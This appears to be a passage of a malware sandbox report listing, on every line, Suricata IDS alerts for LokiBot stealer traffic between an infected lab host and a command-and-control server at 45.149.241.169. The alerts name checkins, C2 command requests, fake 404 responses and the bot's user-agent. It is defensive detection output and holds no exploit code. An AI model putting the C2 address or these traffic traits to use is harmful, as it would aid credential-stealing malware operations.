                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64423 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64367
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64372 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64435 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64435 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64435 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64409 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64435 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64435 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64409 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64435
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64374 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64409 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64369 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49713 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64369 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64369 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49713 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49713 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64361 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64361 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64410
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49713 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64369 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64369 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64400 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64442 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64365 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64365 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64416 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64376
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64365
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64416 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64423 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64416 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64416
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64390 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64423 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64390 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64423 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64409
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64423
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64449 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49714 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64449 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64449 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64437 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64437 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64437 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64449 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64449 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64369
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64424 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64442 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64368 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64400
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64364
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64385 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64424 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64424 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64403 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64396 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64396 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64442
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64433 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64403 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64403 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64408 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64412 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64412 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64412 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64396 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64396 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64424
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64374 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64374 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64412 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64412 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64396
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64437 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64363 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64437 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64385 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64385 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64363 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64412
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64433 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64433 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64363
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64445 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64408
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64433 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49713 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64433 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64432 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64432 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64432 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64433
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64432 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64432 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64368 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64441 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64390 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64441 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64441 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64380 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64380 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:55843
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64380 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64390 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64449
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64390 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64368 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64374 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64403
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49718 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64374 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64386 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64386 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64386 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49714
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64374
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64443 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64421 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64443 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64421 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64443 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64386 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64441 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64368 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64405 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64386 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64383 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64405 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64385 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64405 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64372
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64432
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64382 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64382 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64405 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64382 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64380 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64385 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64434 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64380 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64383 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64421 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64373 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64373 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64382 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64373 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64382 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64421 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64421 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64382
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64373 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64421
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64445 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64445 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64390
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64445 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64445 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64428 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64428 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64428 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64428 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64428 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64445
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64443 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64443 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64443
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64440 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64361 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64361 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64361
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64397 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64397 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64397 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64373 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64441 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64375
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64397 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64386
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64358 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64358 -> 45.149.241.169:80
